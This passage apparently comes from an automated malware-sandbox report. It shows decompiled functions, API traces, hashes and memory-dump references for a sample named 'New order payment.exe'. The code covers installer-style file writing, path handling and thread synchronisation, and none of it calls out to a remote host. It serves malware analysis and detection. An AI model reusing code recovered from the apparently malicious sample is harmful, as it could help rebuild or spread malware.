                                                                0x00405de1
                                                                0x00405deb
                                                                0x00405df7
                                                                0x00405df7
                                                                0x00000000

                                                                APIs
                                                                • GetVersion.KERNEL32(00000000,0041FD10,00000000,00404EBC,0041FD10,00000000), ref: 00405C62
                                                                • GetSystemDirectoryA.KERNEL32 ref: 00405CDD
                                                                • GetWindowsDirectoryA.KERNEL32(sclag,00000400), ref: 00405CF0
                                                                • SHGetSpecialFolderLocation.SHELL32(?,0040F0E0), ref: 00405D2C
                                                                • SHGetPathFromIDListA.SHELL32(0040F0E0,sclag), ref: 00405D3A
                                                                • CoTaskMemFree.OLE32(0040F0E0), ref: 00405D45
                                                                • lstrcatA.KERNEL32(sclag,\Microsoft\Internet Explorer\Quick Launch), ref: 00405D67
                                                                • lstrlenA.KERNEL32(sclag,00000000,0041FD10,00000000,00404EBC,0041FD10,00000000), ref: 00405DB9
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.244114325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.244110727.0000000000400000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244120939.0000000000407000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244125832.0000000000409000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244135351.0000000000417000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244139323.0000000000422000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244144896.000000000042A000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244148657.000000000042D000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$sclag
                                                                • API String ID: 900638850-2169250744
                                                                • Opcode ID: 722f7ba73d7118e4ab3b6bf0c831072dc3c77b8f74574a686c3719bf3172466b
                                                                • Instruction ID: c09fc2b2839bb59ef3d9b0e1161cb0e194e2e056f91f07e7f33828596fbb00b3
                                                                • Opcode Fuzzy Hash: 722f7ba73d7118e4ab3b6bf0c831072dc3c77b8f74574a686c3719bf3172466b
                                                                • Instruction Fuzzy Hash: CE51F331A04A05AAEF215F648C88BBF3B74EF05714F10827BE911B62E0D27C5942DF5E
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 73222EC0, Relevance: 17.5, APIs: 9, Strings: 1, Instructions: 46threadsynchronizationCOMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 92%
                                                                			E73222EC0(intOrPtr* _a4) {
				intOrPtr* _v8;
				long _v12;
				void* _v16;
				void* _t29;

				_v8 = _a4;
				_v12 =  *((intOrPtr*)(_v8 + 0xc));
				_v16 =  *((intOrPtr*)(_v8 + 0x14));
				while(WaitForSingleObject(_v16, _v12) == 0x102) {
					EnterCriticalSection(0x732250ac);
					if( *_v8 == 0x50444830) {
						_push(_v8);
						E73222EB0(_t18);
						_t29 = _t29 + 4;
						if(SetEvent( *(_v8 + 0x10)) != 0) {
							LeaveCriticalSection(0x732250ac);
							continue;
						}
						LeaveCriticalSection(0x732250ac);
						ExitThread(0);
					}
					LeaveCriticalSection(0x732250ac);
					ExitThread(0xc0000bbc);
				}
				ExitThread(0);
			}







                                                                0x73222ec9
                                                                0x73222ed2
                                                                0x73222edb
                                                                0x73222ede
                                                                0x73222f00
                                                                0x73222f0f
                                                                0x73222f2a
                                                                0x73222f2b
                                                                0x73222f30
                                                                0x73222f42
                                                                0x73222f5c
                                                                0x00000000
                                                                0x73222f5c
                                                                0x73222f49
                                                                0x73222f51
                                                                0x73222f51
                                                                0x73222f16
                                                                0x73222f21
                                                                0x73222f21
                                                                0x73222ef5

                                                                APIs
                                                                • WaitForSingleObject.KERNEL32(?,?), ref: 73222EE6
                                                                • ExitThread.KERNEL32 ref: 73222EF5
                                                                • EnterCriticalSection.KERNEL32(732250AC), ref: 73222F00
                                                                • LeaveCriticalSection.KERNEL32(732250AC), ref: 73222F16
                                                                • ExitThread.KERNEL32 ref: 73222F21
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.247725746.0000000073221000.00000020.00020000.sdmp, Offset: 73220000, based on PE: true
                                                                • Associated: 00000000.00000002.247720546.0000000073220000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.247732759.0000000073224000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.247739404.0000000073225000.00000040.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.247749678.0000000073227000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: CriticalExitSectionThread$EnterLeaveObjectSingleWait
                                                                • String ID: 0HDP
                                                                • API String ID: 1874301155-1352146992
                                                                • Opcode ID: 44bda1ebe8a13e5ac1e0ce48897c3bde7e77e09c55989b5ba6d5e4f3da079a35
                                                                • Instruction ID: cd298f9c99ed3152d0e3b35e4bf8136335262adbc78a6d9de6026697376fcbd2
                                                                • Opcode Fuzzy Hash: 44bda1ebe8a13e5ac1e0ce48897c3bde7e77e09c55989b5ba6d5e4f3da079a35
                                                                • Instruction Fuzzy Hash: 72110A75A04218EBD708EFA1CD4CB4DBB75BB5C602F32C154FA0A97242D7359B80EB51
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00405DFA, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 100%
                                                                			E00405DFA(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E004056F8(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E004056B6("*?|<>/\":", _t5))) == 0) {
							E00405830(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}








                                                                0x00405dfc
                                                                0x00405e04
                                                                0x00405e18
                                                                0x00405e18
                                                                0x00405e1e
                                                                0x00405e2b
                                                                0x00405e2b
                                                                0x00405e2c
                                                                0x00405e2e
                                                                0x00405e32
                                                                0x00405e34
                                                                0x00405e3d
                                                                0x00405e3f
                                                                0x00405e59
                                                                0x00405e61
                                                                0x00405e61
                                                                0x00405e66
                                                                0x00405e68
                                                                0x00405e6a
                                                                0x00405e6e
                                                                0x00405e6f
                                                                0x00405e72
                                                                0x00405e7a
                                                                0x00405e7c
                                                                0x00405e80
                                                                0x00000000
                                                                0x00000000
                                                                0x00405e86
                                                                0x00405e8b
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00405e8b
                                                                0x00405e90

                                                                APIs
                                                                • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\New order payment.exe" ,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030D6,C:\Users\user\AppData\Local\Temp\,?,00403289), ref: 00405E52
                                                                • CharNextA.USER32(?,?,?,00000000), ref: 00405E5F
                                                                • CharNextA.USER32(?,"C:\Users\user\Desktop\New order payment.exe" ,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030D6,C:\Users\user\AppData\Local\Temp\,?,00403289), ref: 00405E64
                                                                • CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030D6,C:\Users\user\AppData\Local\Temp\,?,00403289), ref: 00405E74
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.244114325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.244110727.0000000000400000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244120939.0000000000407000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244125832.0000000000409000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244135351.0000000000417000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244139323.0000000000422000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244144896.000000000042A000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244148657.000000000042D000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: Char$Next$Prev
                                                                • String ID: "C:\Users\user\Desktop\New order payment.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                • API String ID: 589700163-64147076
                                                                • Opcode ID: ce236f4316dc44970b3d4854ee077085f8211c330c8e5a50d5c3ec65e4e49f20
                                                                • Instruction ID: 8fb4f4a5a46673644b6d17db89182f96b33943a1441b7055d0135b6347a17e40
                                                                • Opcode Fuzzy Hash: ce236f4316dc44970b3d4854ee077085f8211c330c8e5a50d5c3ec65e4e49f20
                                                                • Instruction Fuzzy Hash: 0411B971804A9029EB321734DC44B7B7F88CB9A7A0F18447BD9D4722C2D67C5E429BED
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 73221B30, Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 80COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 82%
                                                                			E73221B30(void* __ecx, intOrPtr* _a4, signed char _a8, int* _a12, void* _a16) {
				intOrPtr* _v8;

				_v8 = _a4;
				0x73220000("%p %d %p %p\n", _a4, _a8 & 0x000000ff, _a12, _a16, __ecx);
				EnterCriticalSection(0x732250ac);
				if(_v8 == 0 ||  *_v8 != 0x50444831) {
					LeaveCriticalSection(0x732250ac);
					return 0xc0000bbc;
				} else {
					if(_a12 != 0) {
						if( *_a12 >= 0x48) {
							memset(_a16, 0, 0x48);
							 *((intOrPtr*)(_a16 + 4)) =  *((intOrPtr*)(_v8 + 8));
							 *((intOrPtr*)(_a16 + 0xc)) =  *((intOrPtr*)(_v8 + 0xc));
							 *((intOrPtr*)(_a16 + 0x10)) =  *((intOrPtr*)(_v8 + 0x10));
							 *((intOrPtr*)(_a16 + 0x14)) =  *((intOrPtr*)(_v8 + 0x14));
							 *((intOrPtr*)(_a16 + 0x18)) =  *((intOrPtr*)(_v8 + 0x18));
							 *((intOrPtr*)(_a16 + 0x1c)) =  *((intOrPtr*)(_v8 + 0x1c));
							 *_a12 = 0x48;
							LeaveCriticalSection(0x732250ac);
							return 0;
						}
						 *_a12 = 0x48;
						LeaveCriticalSection(0x732250ac);
						return 0x800007d2;
					}
					LeaveCriticalSection(0x732250ac);
					return 0xc0000bbd;
				}
			}




                                                                0x73221b37
                                                                0x73221b50
                                                                0x73221b5d
                                                                0x73221b67
                                                                0x73221b79
                                                                0x00000000
                                                                0x73221b89
                                                                0x73221b8d
                                                                0x73221baa
                                                                0x73221bcf
                                                                0x73221be0
                                                                0x73221bec
                                                                0x73221bf8
                                                                0x73221c04
                                                                0x73221c10
                                                                0x73221c1c
                                                                0x73221c22
                                                                0x73221c2d
                                                                0x00000000
                                                                0x73221c33
                                                                0x73221baf
                                                                0x73221bba
                                                                0x00000000
                                                                0x73221bc0
                                                                0x73221b94
                                                                0x00000000
                                                                0x73221b9a

                                                                APIs
                                                                • EnterCriticalSection.KERNEL32(732250AC), ref: 73221B5D
                                                                • LeaveCriticalSection.KERNEL32(732250AC), ref: 73221B79
                                                                • LeaveCriticalSection.KERNEL32(732250AC), ref: 73221B94
                                                                • LeaveCriticalSection.KERNEL32(732250AC), ref: 73221BBA
                                                                • memset.MSVCRT ref: 73221BCF
                                                                • LeaveCriticalSection.KERNEL32(732250AC), ref: 73221C2D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.247725746.0000000073221000.00000020.00020000.sdmp, Offset: 73220000, based on PE: true
                                                                • Associated: 00000000.00000002.247720546.0000000073220000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.247732759.0000000073224000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.247739404.0000000073225000.00000040.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.247749678.0000000073227000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: CriticalSection$Leave$Entermemset
                                                                • String ID: %p %d %p %p$1HDP
                                                                • API String ID: 2581898777-1506440597
                                                                • Opcode ID: 9e10d2fd77592649b1431cee62062b492da398abf0468967cd402c4b143a636e
                                                                • Instruction ID: 4295077e88137de05e336d78bccad7fceadf9f81e4e263c75b9d905f3d554ea8
                                                                • Opcode Fuzzy Hash: 9e10d2fd77592649b1431cee62062b492da398abf0468967cd402c4b143a636e
                                                                • Instruction Fuzzy Hash: DB31E4B8600209DFCB08CF44CD44E5A7BB1BB58206F228189FD099B351D774EE91DBA1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 73221C40, Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 80COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 82%
                                                                			E73221C40(void* __ecx, intOrPtr* _a4, signed char _a8, int* _a12, void* _a16) {
				intOrPtr* _v8;

				_v8 = _a4;
				0x73220000("%p %d %p %p\n", _a4, _a8 & 0x000000ff, _a12, _a16, __ecx);
				EnterCriticalSection(0x732250ac);
				if(_v8 == 0 ||  *_v8 != 0x50444831) {
					LeaveCriticalSection(0x732250ac);
					return 0xc0000bbc;
				} else {
					if(_a12 != 0) {
						if( *_a12 >= 0x48) {
							memset(_a16, 0, 0x48);
							 *((intOrPtr*)(_a16 + 4)) =  *((intOrPtr*)(_v8 + 8));
							 *((intOrPtr*)(_a16 + 0xc)) =  *((intOrPtr*)(_v8 + 0xc));
							 *((intOrPtr*)(_a16 + 0x10)) =  *((intOrPtr*)(_v8 + 0x10));
							 *((intOrPtr*)(_a16 + 0x14)) =  *((intOrPtr*)(_v8 + 0x14));
							 *((intOrPtr*)(_a16 + 0x18)) =  *((intOrPtr*)(_v8 + 0x18));
							 *((intOrPtr*)(_a16 + 0x1c)) =  *((intOrPtr*)(_v8 + 0x1c));
							 *_a12 = 0x48;
							LeaveCriticalSection(0x732250ac);
							return 0;
						}
						 *_a12 = 0x48;
						LeaveCriticalSection(0x732250ac);
						return 0x800007d2;
					}
					LeaveCriticalSection(0x732250ac);
					return 0xc0000bbd;
				}
			}




                                                                0x73221c47
                                                                0x73221c60
                                                                0x73221c6d
                                                                0x73221c77
                                                                0x73221c89
                                                                0x00000000
                                                                0x73221c99
                                                                0x73221c9d
                                                                0x73221cba
                                                                0x73221cdf
                                                                0x73221cf0
                                                                0x73221cfc
                                                                0x73221d08
                                                                0x73221d14
                                                                0x73221d20
                                                                0x73221d2c
                                                                0x73221d32
                                                                0x73221d3d
                                                                0x00000000
                                                                0x73221d43
                                                                0x73221cbf
                                                                0x73221cca
                                                                0x00000000
                                                                0x73221cd0
                                                                0x73221ca4
                                                                0x00000000
                                                                0x73221caa

                                                                APIs
                                                                • EnterCriticalSection.KERNEL32(732250AC), ref: 73221C6D
                                                                • LeaveCriticalSection.KERNEL32(732250AC), ref: 73221C89
                                                                • LeaveCriticalSection.KERNEL32(732250AC), ref: 73221CA4
                                                                • LeaveCriticalSection.KERNEL32(732250AC), ref: 73221CCA
                                                                • memset.MSVCRT ref: 73221CDF
                                                                • LeaveCriticalSection.KERNEL32(732250AC), ref: 73221D3D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.247725746.0000000073221000.00000020.00020000.sdmp, Offset: 73220000, based on PE: true
                                                                • Associated: 00000000.00000002.247720546.0000000073220000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.247732759.0000000073224000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.247739404.0000000073225000.00000040.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.247749678.0000000073227000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: CriticalSection$Leave$Entermemset
                                                                • String ID: %p %d %p %p$1HDP
                                                                • API String ID: 2581898777-1506440597
                                                                • Opcode ID: 3d0a54d24ee864dc84bf2e94e3f7b6a1d57d7ddb0be525f712babc055625796f
                                                                • Instruction ID: cb6acab0532cd2d4558d45ae83f36fa830d69e16e94bc329f45f32cdf4e1838f
                                                                • Opcode Fuzzy Hash: 3d0a54d24ee864dc84bf2e94e3f7b6a1d57d7ddb0be525f712babc055625796f
                                                                • Instruction Fuzzy Hash: 5531F3B8600208DFCB08CF44CD44E5ABBB1BB58206F228189FD099B352D735EE91DFA1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00403EBB, Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 100%
                                                                			E00403EBB(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t35;
				long _t37;
				void* _t40;
				long* _t49;

				if(_a4 + 0xfffffecd > 5) {
					L15:
					return 0;
				}
				_t49 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t49 == 0) {
					goto L15;
				}
				_t35 =  *_t49;
				if((_t49[5] & 0x00000002) != 0) {
					_t35 = GetSysColor(_t35);
				}
				if((_t49[5] & 0x00000001) != 0) {
					SetTextColor(_a8, _t35);
				}
				SetBkMode(_a8, _t49[4]);
				_t37 = _t49[1];
				_v16.lbColor = _t37;
				if((_t49[5] & 0x00000008) != 0) {
					_t37 = GetSysColor(_t37);
					_v16.lbColor = _t37;
				}
				if((_t49[5] & 0x00000004) != 0) {
					SetBkColor(_a8, _t37);
				}
				if((_t49[5] & 0x00000010) != 0) {
					_v16.lbStyle = _t49[2];
					_t40 = _t49[3];
					if(_t40 != 0) {
						DeleteObject(_t40);
					}
					_t49[3] = CreateBrushIndirect( &_v16);
				}
				return _t49[3];
			}








                                                                0x00403ecd
                                                                0x00403f61
                                                                0x00000000
                                                                0x00403f61
                                                                0x00403ede
                                                                0x00403ee2
                                                                0x00000000
                                                                0x00000000
                                                                0x00403ee8
                                                                0x00403ef1
                                                                0x00403ef4
                                                                0x00403ef4
                                                                0x00403efa
                                                                0x00403f00
                                                                0x00403f00
                                                                0x00403f0c
                                                                0x00403f12
                                                                0x00403f19
                                                                0x00403f1c
                                                                0x00403f1f
                                                                0x00403f21
                                                                0x00403f21
                                                                0x00403f29
                                                                0x00403f2f
                                                                0x00403f2f
                                                                0x00403f39
                                                                0x00403f3e
                                                                0x00403f41
                                                                0x00403f46
                                                                0x00403f49
                                                                0x00403f49
                                                                0x00403f59
                                                                0x00403f59
                                                                0x00000000

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.244114325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.244110727.0000000000400000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244120939.0000000000407000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244125832.0000000000409000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244135351.0000000000417000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244139323.0000000000422000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244144896.000000000042A000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244148657.000000000042D000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                • String ID:
                                                                • API String ID: 2320649405-0
                                                                • Opcode ID: c17ffa4718e249222cf94fd394cb2cb31c18988dc7419d15a412fba3cf9ed351
                                                                • Instruction ID: 51638b03811fbd3f25a4eb1d810876b9f584da0c3187da66c7daa715c1b02470
                                                                • Opcode Fuzzy Hash: c17ffa4718e249222cf94fd394cb2cb31c18988dc7419d15a412fba3cf9ed351
                                                                • Instruction Fuzzy Hash: 08218471904745ABCB219F78DD08B4BBFF8AF05715B048629F856E22E0D734E904CB55
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 73221290, Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 117COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 65%
                                                                			E73221290(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _t53;
				intOrPtr* _t56;
				intOrPtr _t67;
				signed int _t96;
				void* _t100;
				void* _t102;
				void* _t103;

				_v16 = _a4;
				_t53 = _a8;
				0x73220000(_t53, _a12, _a16);
				0x73220000("%p %s %lx %p\n", _a4, _t53);
				_t102 = _t100 + 0x18;
				if(_a8 == 0 || _a16 == 0) {
					return 0xc0000bbd;
				} else {
					EnterCriticalSection(0x732250ac);
					if(_v16 == 0 ||  *_v16 != 0x50444830) {
						LeaveCriticalSection(0x732250ac);
						return 0xc0000bbc;
					} else {
						_t56 = _a16;
						 *_t56 = 0;
						_v8 = 0;
						while(1) {
							0x73220000(0x73224180);
							_t103 = _t102 + 4;
							if(_v8 >= _t56) {
								break;
							}
							_t18 = (_v8 << 5) + 0x73224184; // 0x732263a8
							_t74 =  *_t18;
							_t56 = E73222D50( *_t18, _a8);
							_t102 = _t103 + 8;
							if(_t56 == 0) {
								_v8 = _v8 + 1;
								continue;
							}
							_v12 = E73222BE0(_t56, _t74);
							if(_v12 == 0) {
								LeaveCriticalSection(0x732250ac);
								return 0xc0000bbb;
							}
							_t22 = (_v8 << 5) + 0x73224184; // 0x732263a8
							 *((intOrPtr*)(_v12 + 4)) = E73222B30(_t74,  *_t22);
							_t27 = (_v8 << 5) + 0x73224188; // 0x73222c90
							 *((intOrPtr*)(_v12 + 0x30)) =  *_t27;
							_t31 = (_v8 << 5) + 0x7322418c; // 0x21510500
							 *((intOrPtr*)(_v12 + 8)) =  *_t31;
							_t35 = (_v8 << 5) + 0x73224190; // 0xfffffffb
							 *((intOrPtr*)(_v12 + 0x14)) =  *_t35;
							_t96 = _v8 << 5;
							_t67 = _v12;
							_t39 = _t96 + 0x73224198; // 0x989680
							 *((intOrPtr*)(_t67 + 0x20)) =  *_t39;
							_t41 = _t96 + 0x7322419c; // 0x0
							 *((intOrPtr*)(_t67 + 0x24)) =  *_t41;
							 *((intOrPtr*)(_v12 + 0x1c)) =  *((intOrPtr*)(_v16 + 4));
							 *((intOrPtr*)(_v12 + 0x18)) = _a12;
							 *_a16 = _v12;
							LeaveCriticalSection(0x732250ac);
							return 0;
						}
						LeaveCriticalSection(0x732250ac);
						return 0xc0000bb9;
					}
				}
			}













                                                                0x73221299
                                                                0x732212a4
                                                                0x732212a8
                                                                0x732212ba
                                                                0x732212bf
                                                                0x732212c6
                                                                0x00000000
                                                                0x732212d8
                                                                0x732212dd
                                                                0x732212e7
                                                                0x732212f9
                                                                0x00000000
                                                                0x73221309
                                                                0x73221309
                                                                0x7322130c
                                                                0x73221312
                                                                0x73221324
                                                                0x73221329
                                                                0x7322132e
                                                                0x73221334
                                                                0x00000000
                                                                0x00000000
                                                                0x73221344
                                                                0x73221344
                                                                0x7322134b
                                                                0x73221350
                                                                0x73221355
                                                                0x73221321
                                                                0x00000000
                                                                0x73221321
                                                                0x73221360
                                                                0x73221367
                                                                0x7322140a
                                                                0x00000000
                                                                0x73221410
                                                                0x73221373
                                                                0x73221385
                                                                0x73221391
                                                                0x73221397
                                                                0x732213a3
                                                                0x732213a9
                                                                0x732213b5
                                                                0x732213bb
                                                                0x732213c1
                                                                0x732213c4
                                                                0x732213c7
                                                                0x732213cd
                                                                0x732213d0
                                                                0x732213d6
                                                                0x732213e2
                                                                0x732213eb
                                                                0x732213f4
                                                                0x732213fb
                                                                0x00000000
                                                                0x73221401
                                                                0x73221421
                                                                0x00000000
                                                                0x73221427
                                                                0x732212e7

                                                                APIs
                                                                • EnterCriticalSection.KERNEL32(732250AC), ref: 732212DD
                                                                • LeaveCriticalSection.KERNEL32(732250AC), ref: 732212F9
                                                                • LeaveCriticalSection.KERNEL32(732250AC), ref: 73221421
                                                                  • Part of subcall function 73222D50: wcschr.MSVCRT ref: 73222D87
                                                                  • Part of subcall function 73222D50: wcschr.MSVCRT ref: 73222DCF
                                                                • LeaveCriticalSection.KERNEL32(732250AC), ref: 732213FB
                                                                • LeaveCriticalSection.KERNEL32(732250AC), ref: 7322140A
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.247725746.0000000073221000.00000020.00020000.sdmp, Offset: 73220000, based on PE: true
                                                                • Associated: 00000000.00000002.247720546.0000000073220000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.247732759.0000000073224000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.247739404.0000000073225000.00000040.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.247749678.0000000073227000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: CriticalSection$Leave$wcschr$Enter
                                                                • String ID: %p %s %lx %p$0HDP
                                                                • API String ID: 263007561-936769701
                                                                • Opcode ID: 2c244a10c6c2ca19d8cbdaa1711bd0eb6c5c57a307a4625c2b9544d367eaccfe
                                                                • Instruction ID: a90bd7933dd43019fe6bf9d9fa05cd7c94cc92839b9092acd3aad15790e252eb
                                                                • Opcode Fuzzy Hash: 2c244a10c6c2ca19d8cbdaa1711bd0eb6c5c57a307a4625c2b9544d367eaccfe
                                                                • Instruction Fuzzy Hash: A9411CB4A00218EFDB04DF99DD84F4DBBB5BB58306F238199E8199B345D774AA80CF51
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 004026AF, Relevance: 10.6, APIs: 7, Instructions: 89memoryfileCOMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 86%
                                                                			E004026AF(struct _OVERLAPPED* __ebx) {
				void* _t27;
				long _t32;
				struct _OVERLAPPED* _t47;
				void* _t51;
				void* _t53;
				void* _t56;
				void* _t57;
				void* _t58;

				_t47 = __ebx;
				 *((intOrPtr*)(_t58 - 0xc)) = 0xfffffd66;
				_t52 = E00402A29(0xfffffff0);
				 *(_t58 - 0x38) = _t24;
				if(E004056F8(_t52) == 0) {
					E00402A29(0xffffffed);
				}
				E00405850(_t52);
				_t27 = E0040586F(_t52, 0x40000000, 2);
				 *(_t58 + 8) = _t27;
				if(_t27 != 0xffffffff) {
					_t32 =  *0x423f54; // 0x8200
					 *(_t58 - 0x30) = _t32;
					_t51 = GlobalAlloc(0x40, _t32);
					if(_t51 != _t47) {
						E004030B3(_t47);
						E00403081(_t51,  *(_t58 - 0x30));
						_t56 = GlobalAlloc(0x40,  *(_t58 - 0x20));
						 *(_t58 - 0x34) = _t56;
						if(_t56 != _t47) {
							E00402E8E( *((intOrPtr*)(_t58 - 0x24)), _t47, _t56,  *(_t58 - 0x20));
							while( *_t56 != _t47) {
								_t49 =  *_t56;
								_t57 = _t56 + 8;
								 *(_t58 - 0x48) =  *_t56;
								E00405830( *((intOrPtr*)(_t56 + 4)) + _t51, _t57, _t49);
								_t56 = _t57 +  *(_t58 - 0x48);
							}
							GlobalFree( *(_t58 - 0x34));
						}
						WriteFile( *(_t58 + 8), _t51,  *(_t58 - 0x30), _t58 - 0x3c, _t47);
						GlobalFree(_t51);
						 *((intOrPtr*)(_t58 - 0xc)) = E00402E8E(0xffffffff,  *(_t58 + 8), _t47, _t47);
					}
					CloseHandle( *(_t58 + 8));
				}
				_t53 = 0xfffffff3;
				if( *((intOrPtr*)(_t58 - 0xc)) < _t47) {
					_t53 = 0xffffffef;
					DeleteFileA( *(_t58 - 0x38));
					 *((intOrPtr*)(_t58 - 4)) = 1;
				}
				_push(_t53);
				E00401423();
				 *0x423fc8 =  *0x423fc8 +  *((intOrPtr*)(_t58 - 4));
				return 0;
			}











                                                                0x004026af
                                                                0x004026b1
                                                                0x004026bd
                                                                0x004026c0
                                                                0x004026ca
                                                                0x004026ce
                                                                0x004026ce
                                                                0x004026d4
                                                                0x004026e1
                                                                0x004026e9
                                                                0x004026ec
                                                                0x004026f2
                                                                0x00402700
                                                                0x00402705
                                                                0x00402709
                                                                0x0040270c
                                                                0x00402715
                                                                0x00402721
                                                                0x00402725
                                                                0x00402728
                                                                0x00402732
                                                                0x00402751
                                                                0x00402739
                                                                0x0040273e
                                                                0x00402746
                                                                0x00402749
                                                                0x0040274e
                                                                0x0040274e
                                                                0x00402758
                                                                0x00402758
                                                                0x0040276a
                                                                0x00402771
                                                                0x00402783
                                                                0x00402783
                                                                0x00402789
                                                                0x00402789
                                                                0x00402794
                                                                0x00402795
                                                                0x00402799
                                                                0x0040279d
                                                                0x004027a3
                                                                0x004027a3
                                                                0x004027aa
                                                                0x00402197
                                                                0x004028c1
                                                                0x004028cd

                                                                APIs
                                                                • GlobalAlloc.KERNEL32(00000040,00008200,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402703
                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 0040271F
                                                                • GlobalFree.KERNEL32 ref: 00402758
